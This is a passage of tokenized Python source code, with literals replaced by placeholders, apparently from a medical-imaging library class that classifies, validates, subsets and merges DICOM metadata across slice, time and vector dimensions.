) <EOL> @ property <EOL> def n_slices ( self ) : <EOL> '''<STR_LIT>''' <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is None : <EOL> return None <EOL> return self . shape [ slice_dim ] <EOL> classifications = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> '''<STR_LIT>''' <EOL> def get_valid_classes ( self ) : <EOL> '''<STR_LIT>''' <EOL> shape = self . shape <EOL> n_dims = len ( shape ) <EOL> if n_dims == <NUM_LIT:3> : <EOL> return self . classifications [ : <NUM_LIT:2> ] <EOL> elif n_dims == <NUM_LIT:4> : <EOL> return self . classifications [ : <NUM_LIT:4> ] <EOL> elif n_dims == <NUM_LIT:5> : <EOL> if shape [ <NUM_LIT:3> ] != <NUM_LIT:1> : <EOL> return self . classifications <EOL> else : <EOL> return self . classifications [ : <NUM_LIT:2> ] + self . classifications [ - <NUM_LIT:2> : ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def get_multiplicity ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> if not classification in self . get_valid_classes ( ) : <EOL> raise ValueError ( "<STR_LIT>" % classification ) <EOL> base , sub = classification <EOL> shape = self . shape <EOL> n_vals = <NUM_LIT:1> <EOL> if sub == '<STR_LIT>' : <EOL> n_vals = self . n_slices <EOL> if n_vals is None : <EOL> return <NUM_LIT:0> <EOL> if base == '<STR_LIT>' : <EOL> n_vals *= shape [ <NUM_LIT:3> ] <EOL> elif base == '<STR_LIT>' : <EOL> for dim_size in shape [ <NUM_LIT:3> : ] : <EOL> n_vals *= dim_size <EOL> elif sub == '<STR_LIT>' : <EOL> if base == '<STR_LIT:time>' : <EOL> n_vals = shape [ <NUM_LIT:3> ] <EOL> if len ( shape ) == <NUM_LIT:5> : <EOL> n_vals *= shape [ <NUM_LIT:4> ] <EOL> elif base == '<STR_LIT>' : <EOL> n_vals = shape [ <NUM_LIT:4> ] <EOL> return n_vals <EOL> def check_valid ( self ) : <EOL> '''<STR_LIT>''' <EOL> if not _req_base_keys_map [ self . version ] <= set ( self . _content ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> if self . affine . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is not None : <EOL> if not ( <NUM_LIT:0> <= slice_dim < <NUM_LIT:3> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> if not ( <NUM_LIT:3> <= len ( self . shape ) < <NUM_LIT:6> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> valid_classes = self . get_valid_classes ( ) <EOL> for classes in valid_classes : <EOL> if not classes [ <NUM_LIT:0> ] in self . _content : <EOL> raise InvalidExtensionError ( '<STR_LIT>' <EOL> '<STR_LIT>' % classes [ <NUM_LIT:0> ] ) <EOL> if not classes [ <NUM_LIT:1> ] in self . _content [ classes [ <NUM_LIT:0> ] ] : <EOL> raise InvalidExtensionError ( ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % classes ) <EOL> cls_meta = self . get_class_dict ( classes ) <EOL> cls_mult = self . get_multiplicity ( classes ) <EOL> if cls_mult == <NUM_LIT:0> and len ( cls_meta ) != <NUM_LIT:0> : <EOL> raise InvalidExtensionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif cls_mult > <NUM_LIT:1> : <EOL> for key , vals in cls_meta . iteritems ( ) : <EOL> n_vals = len ( vals ) <EOL> if n_vals != cls_mult : <EOL> msg = ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % <EOL> ( key , classes , cls_mult , n_vals ) <EOL> ) <EOL> raise InvalidExtensionError ( msg ) <EOL> for classes in valid_classes : <EOL> for other_classes in valid_classes : <EOL> if classes == other_classes : <EOL> continue <EOL> intersect = ( set ( self . get_class_dict ( classes ) ) & <EOL> set ( self . get_class_dict ( other_classes ) ) <EOL> ) <EOL> if len ( intersect ) != <NUM_LIT:0> : <EOL> raise InvalidExtensionError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def get_keys ( self ) : <EOL> '''<STR_LIT>''' <EOL> keys = [ ] <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> keys += self . _content [ base_class ] [ sub_class ] . keys ( ) <EOL> return keys <EOL> def get_classification ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> if key in self . _content [ base_class ] [ sub_class ] : <EOL> return ( base_class , sub_class ) <EOL> return None <EOL> def get_class_dict ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> base , sub = classification <EOL> return self . _content [ base ] [ sub ] <EOL> def get_values ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> classification = self . get_classification ( key ) <EOL> if classification is None : <EOL> return None <EOL> return self . get_class_dict ( classification ) [ key ] <EOL> def get_values_and_class ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> classification = self . get_classification ( key ) <EOL> if classification is None : <EOL> return ( None , None ) <EOL> return ( self . get_class_dict ( classification ) [ key ] , classification ) <EOL> def filter_meta ( self , filter_func ) : <EOL> '''<STR_LIT>''' <EOL> for classes in self . get_valid_classes ( ) : <EOL> filtered = [ ] <EOL> curr_dict = self . get_class_dict ( classes ) <EOL> for key , values in curr_dict . iteritems ( ) : <EOL> if filter_func ( key , values ) : <EOL> filtered . append ( key ) <EOL> for key in filtered : <EOL> del curr_dict [ key ] <EOL> def clear_slice_meta ( self ) : <EOL> '''<STR_LIT>''' <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> if sub_class == '<STR_LIT>' : <EOL> self . get_class_dict ( ( base_class , sub_class ) ) . clear ( ) <EOL> def get_subset ( self , dim , idx ) : <EOL> '''<STR_LIT>''' <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> shape = self . shape <EOL> valid_classes = self . get_valid_classes ( ) <EOL> result_shape = list ( shape ) <EOL> result_shape [ dim ] = <NUM_LIT:1> <EOL> while result_shape [ - <NUM_LIT:1> ] == <NUM_LIT:1> and len ( result_shape ) > <NUM_LIT:3> : <EOL> result_shape = result_shape [ : - <NUM_LIT:1> ] <EOL> result = self . make_empty ( result_shape , <EOL> self . affine , <EOL> self . reorient_transform , <EOL> self . slice_dim <EOL> ) <EOL> for src_class in valid_classes : <EOL> if src_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> for key , val in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( val ) <EOL> continue <EOL> if dim == self . slice_dim : <EOL> if src_class [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> for key , vals in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> result . _copy_slice ( self , src_class , idx ) <EOL> elif dim < <NUM_LIT:3> : <EOL> for key , vals in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> elif dim == <NUM_LIT:3> : <EOL> result . _copy_sample ( self , src_class , '<STR_LIT:time>' , idx ) <EOL> else : <EOL> result . _copy_sample ( self , src_class , '<STR_LIT>' , idx ) <EOL> return result <EOL> def to_json ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . check_valid ( ) <EOL> return self . _mangle ( self . _content ) <EOL> @ classmethod <EOL> def from_json ( klass , json_str ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , json_str ) <EOL> result . check_valid ( ) <EOL> return result <EOL> @ classmethod <EOL> def make_empty ( klass , shape , affine , reorient_transform = None , <EOL> slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , '<STR_LIT:{}>' ) <EOL> result . _content [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> if len ( shape ) > <NUM_LIT:3> and shape [ <NUM_LIT:3> ] != <NUM_LIT:1> : <EOL> result . _content [ '<STR_LIT:time>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT:time>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT:time>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> if len ( shape ) > <NUM_LIT:4> : <EOL> result . _content [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] = [ ] <EOL> result . shape = shape <EOL> result . affine = affine <EOL> result . reorient_transform = reorient_transform <EOL> result . slice_dim = slice_dim <EOL> result . version = _meta_version <EOL> return result <EOL> @ classmethod <EOL> def from_runtime_repr ( klass , runtime_repr ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , '<STR_LIT:{}>' ) <EOL> result . _content = runtime_repr <EOL> result . check_valid ( ) <EOL> return result <EOL> @ classmethod <EOL> def from_sequence ( klass , seq , dim , affine = None , slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> n_inputs = len ( seq ) <EOL> first_input = seq [ <NUM_LIT:0> ] <EOL> input_shape = first_input . shape <EOL> if len ( input_shape ) > dim and input_shape [ dim ] != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> output_shape = list ( input_shape ) <EOL> while len ( output_shape ) <= dim : <EOL> output_shape . append ( <NUM_LIT:1> ) <EOL> output_shape [ dim ] = n_inputs <EOL> if affine is None : <EOL> affine = first_input . affine <EOL> if slice_dim is None : <EOL> slice_dim = first_input . slice_dim <EOL> result = klass . make_empty ( output_shape , <EOL> affine , <EOL> None , <EOL> slice_dim ) <EOL> result_slc_norm = result . slice_normal <EOL> first_slc_norm = first_input . slice_normal <EOL> use_slices = ( not result_slc_norm is None and <EOL> not first_slc_norm is None and <EOL> np . allclose ( result_slc_norm , first_slc_norm ) ) <EOL> for classes in first_input . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' and not use_slices : <EOL> continue <EOL> result . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = deepcopy ( first_input . get_class_dict ( classes ) ) <EOL> shape = list ( result . shape ) <EOL> shape [ dim ] = <NUM_LIT:1> <EOL> result . shape = shape <EOL> reorient_transform = first_input . reorient_transform <EOL> for input_ext in seq [ <NUM_LIT:1> : ] : <EOL> if ( ( reorient_transform is None or <EOL> input_ext . reorient_transform is None ) or <EOL> not ( np . allclose ( input_ext . affine , affine ) or <EOL> np . allclose ( input_ext . reorient_transform , <EOL> reorient_transform ) <EOL> ) <EOL> ) : <EOL> reorient_transform = None <EOL> result . _insert ( dim , input_ext ) <EOL> shape [ dim ] += <NUM_LIT:1> <EOL> result . shape = shape <EOL> result . reorient_transform = reorient_transform <EOL> for key in result . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) . keys ( ) : <EOL> result . _simplify ( key ) <EOL> return result <EOL> def __str__ ( self ) : <EOL> return self . _mangle ( self . _content ) <EOL> def __eq__ ( self , other ) : <EOL> if not np . allclose ( self . affine , other . affine ) : <EOL> return False <EOL> if self . shape != other . shape : <EOL> return False <EOL> if self . slice_dim != other . slice_dim : <EOL> return False <EOL> if self . version != other . version : <EOL> return False <EOL> for classes in self . get_valid_classes ( ) : <EOL> if ( dict ( self . get_class_dict ( classes ) ) != <EOL> dict ( other . get_class_dict ( classes ) ) ) : <EOL> return False <EOL> return True <EOL> def _unmangle ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = { } <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> kwargs [ '<STR_LIT>' ] = OrderedDict <EOL> return json . loads ( value , ** kwargs ) <EOL> def _mangle ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> return json . dumps ( value , indent = <NUM_LIT:4> ) <EOL> _const_tests = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _get_const_period ( self , src_cls , dest_cls ) : <EOL> '''<STR_LIT>''' <EOL> if dest_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return None <EOL> elif src_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . get_multiplicity ( src_cls ) / self . get_multiplicity ( dest_cls ) <EOL> elif src_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . n_slices <EOL> elif src_cls == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return self . shape [ <NUM_LIT:3> ] <EOL> assert False <EOL> _repeat_tests = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _simplify ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if values is None : <EOL> del self . get_class_dict ( curr_class ) [ key ] <EOL> return True <EOL> return False <EOL> dests = self . _const_tests [ curr_class ] <EOL> for dest_cls in dests : <EOL> if dest_cls [ <NUM_LIT:0> ] in self . _content : <EOL> period = self . _get_const_period ( curr_class , dest_cls ) <EOL> if period == <NUM_LIT:1> or is_constant ( values , period ) : <EOL> if period is None : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ <NUM_LIT:0> ] <EOL> else : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ : : period ] <EOL> break <EOL> else : <EOL> if curr_class in self . _repeat_tests : <EOL> for dest_cls in self . _repeat_tests [ curr_class ] : <EOL> if dest_cls [ <NUM_LIT:0> ] in self . _content : <EOL> dest_mult = self . get_multiplicity ( dest_cls ) <EOL> if is_repeating ( values , dest_mult ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ : dest_mult ] <EOL> break <EOL> else : <EOL> return False <EOL> else : <EOL> return False <EOL> del self . get_class_dict ( curr_class ) [ key ] <EOL> return True <EOL> _preserving_changes = { None : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : tuple ( ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _get_changed_class ( self , key , new_class , slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == new_class : <EOL> return values <EOL> if not new_class in self . _preserving_changes [ curr_class ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if curr_class is None : <EOL> curr_mult = <NUM_LIT:1> <EOL> per_slice = False <EOL> else : <EOL> curr_mult = self . get_multiplicity ( curr_class ) <EOL> per_slice = curr_class [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> if new_class in self . get_valid_classes ( ) : <EOL> new_mult = self . get_multiplicity ( new_class ) <EOL> if new_mult == <NUM_LIT:0> : <EOL> new_mult = self . shape [ slice_dim ] <EOL> else : <EOL> new_mult = <NUM_LIT:1> <EOL> mult_fact = new_mult / curr_mult <EOL> if curr_mult == <NUM_LIT:1> : <EOL> values = [ values ] <EOL> if per_slice : <EOL> result = values * mult_fact <EOL> else : <EOL> result = [ ] <EOL> for value in values : <EOL> result . extend ( [ deepcopy ( value ) ] * mult_fact ) <EOL> if new_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> result = result [ <NUM_LIT:0> ] <EOL> return result <EOL> def _change_class ( self , key , new_class ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == new_class : <EOL> return <EOL> self . get_class_dict ( new_class ) [ key ] = self . _get_changed_class ( key , <EOL> new_class ) <EOL> if not curr_class is None : <EOL> del self . get_class_dict ( curr_class ) [ key ] <EOL> def _copy_slice ( self , other , src_class , idx ) : <EOL> '''<STR_LIT>''' <EOL> if src_class [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for classes in ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if classes in self . get_valid_classes ( ) : <EOL> dest_class = classes <EOL> break <EOL> elif src_class [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for classes in ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if classes in self . get_valid_classes ( ) : <EOL> dest_class = classes <EOL> break <EOL> else : <EOL> dest_class = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> src_dict = other . get_class_dict ( src_class ) <EOL> dest_dict = self . get_class_dict ( dest_class ) <EOL> dest_mult = self . get_multiplicity ( dest_class ) <EOL> stride = other . n_slices <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> subset_vals = vals [ idx : : stride ] <EOL> if len ( subset_vals ) < dest_mult : <EOL> full_vals = [ ] <EOL> for val_idx in xrange ( dest_mult / len ( subset_vals ) ) : <EOL> full_vals += deepcopy ( subset_vals ) <EOL> subset_vals = full_vals <EOL> if len ( subset_vals ) == <NUM_LIT:1> : <EOL> subset_vals = subset_vals [ <NUM_LIT:0> ] <EOL> dest_dict [ key ] = deepcopy ( subset_vals ) <EOL> self . _simplify ( key ) <EOL> def _global_slice_subset ( self , key , sample_base , idx ) : <EOL> '''<STR_LIT>''' <EOL> n_slices = self . n_slices <EOL> shape = self . shape <EOL> src_dict = self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if sample_base == '<STR_LIT>' : <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> start_idx = idx * slices_per_vec <EOL> end_idx = start_idx + slices_per_vec <EOL> return src_dict [ key ] [ start_idx : end_idx ] <EOL> else : <EOL> if not ( '<STR_LIT>' , '<STR_LIT>' ) in self . get_valid_classes ( ) : <EOL> start_idx = idx * n_slices <EOL> end_idx = start_idx + n_slices <EOL> return src_dict [ key ] [ start_idx : end_idx ] <EOL> else : <EOL> result = [ ] <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> for vec_idx in xrange ( shape [ <NUM_LIT:4> ] ) : <EOL> start_idx = ( vec_idx * slices_per_vec ) + ( idx * n_slices ) <EOL> end_idx = start_idx + n_slices <EOL> result . extend ( src_dict [ key ] [ start_idx : end_idx ] ) <EOL> return result <EOL> def _copy_sample ( self , other , src_class , sample_base , idx ) : <EOL> '''<STR_LIT>''' <EOL> assert src_class != ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> src_dict = other . get_class_dict ( src_class ) <EOL> if src_class [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> if src_class [ <NUM_LIT:0> ] == sample_base : <EOL> best_dest = None <EOL> for dest_cls in ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if ( dest_cls != src_class and <EOL> dest_cls in self . get_valid_classes ( ) <EOL> ) : <EOL> best_dest = dest_cls <EOL> break <EOL> dest_mult = self . get_multiplicity ( dest_cls ) <EOL> if dest_mult == <NUM_LIT:1> : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = deepcopy ( vals [ idx ] ) <EOL> else : <EOL> stride = other . shape [ <NUM_LIT:3> ] <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = deepcopy ( vals [ idx : : stride ] ) <EOL> for key in src_dict . keys ( ) : <EOL> self . _simplify ( key ) <EOL> else : <EOL> if src_class == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> dest_mult = self . get_multiplicity ( src_class ) <EOL> start_idx = idx * dest_mult <EOL> end_idx = start_idx + dest_mult <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals [ start_idx : end_idx ] ) <EOL> self . _simplify ( key ) <EOL> else : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> if src_class [ <NUM_LIT:0> ] == sample_base : <EOL> best_dest = None <EOL> for dest_class in self . _preserving_changes [ src_class ] : <EOL> if dest_class in self . get_valid_classes ( ) : <EOL> best_dest = dest_class <EOL> break <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( best_dest ) [ key ] = deepcopy ( vals ) <EOL> elif src_class [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> if sample_base == '<STR_LIT:time>' : <EOL> n_slices = self . n_slices <EOL> start_idx = idx * n_slices <EOL> end_idx = start_idx + n_slices <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals [ start_idx : end_idx ] ) <EOL> self . _simplify ( key ) <EOL> else : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> subset_vals = other . _global_slice_subset ( key , sample_base , idx ) <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( subset_vals ) <EOL> self . _simplify ( key ) <EOL> def _insert ( self , dim , other ) : <EOL> self_slc_norm = self . slice_normal <EOL> other_slc_norm = other . slice_normal <EOL> use_slices = ( not self_slc_norm is None and <EOL> not other_slc_norm is None and <EOL> np . allclose ( self_slc_norm , other_slc_norm ) ) <EOL> other_slc_meta = { } <EOL> if not use_slices : <EOL> for classes in other . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> other_slc_meta [ classes ] = other . get_class_dict ( classes ) <EOL> other . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = { } <EOL> missing_keys = list ( set ( self . get_keys ( ) ) - set ( other . get_keys ( ) ) ) <EOL> for other_classes in other . get_valid_classes ( ) : <EOL> other_keys = other . get_class_dict ( other_classes ) . keys ( ) <EOL> if other_classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> other_keys += missing_keys <EOL> for key in other_keys : <EOL> local_classes = self . get_classification ( key ) <EOL> if local_classes != other_classes : <EOL> local_allow = self . _preserving_changes [ local_classes ] <EOL> other_allow = self . _preserving_changes [ other_classes ] <EOL> if other_classes in local_allow : <EOL> self . _change_class ( key , other_classes ) <EOL> elif not local_classes in other_allow : <EOL> best_dest = None <EOL> for dest_class in local_allow : <EOL> if ( dest_class [ <NUM_LIT:0> ] in self . _content and <EOL> dest_class in other_allow ) : <EOL> best_dest = dest_class <EOL> break <EOL> self . _change_class ( key , best_dest ) <EOL> for key in other_keys : <EOL> if dim == self . slice_dim : <EOL> self . _insert_slice ( key , other ) <EOL> elif dim < <NUM_LIT:3> : <EOL> self . _insert_non_slice ( key , other ) <EOL> elif dim == <NUM_LIT:3> : <EOL> self . _insert_sample ( key , other , '<STR_LIT:time>' ) <EOL> elif dim == <NUM_LIT:4> : <EOL> self . _insert_sample ( key , other , '<STR_LIT>' ) <EOL> if not use_slices : <EOL> for classes in other . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> other . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = other_slc_meta [ classes ] <EOL> def _insert_slice ( self , key , other ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if local_vals != other_vals : <EOL> for dest_base in ( '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if dest_base in self . _content : <EOL> self . _change_class ( key , ( dest_base , '<STR_LIT>' ) ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( dest_base , <EOL> '<STR_LIT>' ) , <EOL> self . slice_dim <EOL> ) <EOL> self . get_values ( key ) . extend ( other_vals ) <EOL> break <EOL> elif classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> local_vals . extend ( other_vals ) <EOL> else : <EOL> if classes != ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _change_class ( key , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> local_vals = self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . slice_dim ) <EOL> n_slices = self . n_slices <EOL> other_n_slices = other . n_slices <EOL> shape = self . shape <EOL> n_vols = <NUM_LIT:1> <EOL> for dim_size in shape [ <NUM_LIT:3> : ] : <EOL> n_vols *= dim_size <EOL> intlv = [ ] <EOL> loc_start = <NUM_LIT:0> <EOL> oth_start = <NUM_LIT:0> <EOL> for vol_idx in xrange ( n_vols ) : <EOL> intlv += local_vals [ loc_start : loc_start + n_slices ] <EOL> intlv += other_vals [ oth_start : oth_start + other_n_slices ] <EOL> loc_start += n_slices <EOL> oth_start += other_n_slices <EOL> self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] = intlv <EOL> def _insert_non_slice ( self , key , other ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if local_vals != other_vals : <EOL> del self . get_class_dict ( classes ) [ key ] <EOL> def _insert_sample ( self , key , other , sample_base ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if local_vals != other_vals : <EOL> self . _change_class ( key , ( sample_base , '<STR_LIT>' ) ) <EOL> local_vals = self . get_values ( key ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( sample_base , '<STR_LIT>' ) , <EOL> self . slice_dim <EOL> ) <EOL> local_vals . extend ( other_vals ) <EOL> elif classes == ( sample_base , '<STR_LIT>' ) : <EOL> local_vals . extend ( other_vals ) <EOL> else : <EOL> if classes != ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _change_class ( key , ( '<STR_LIT>' , 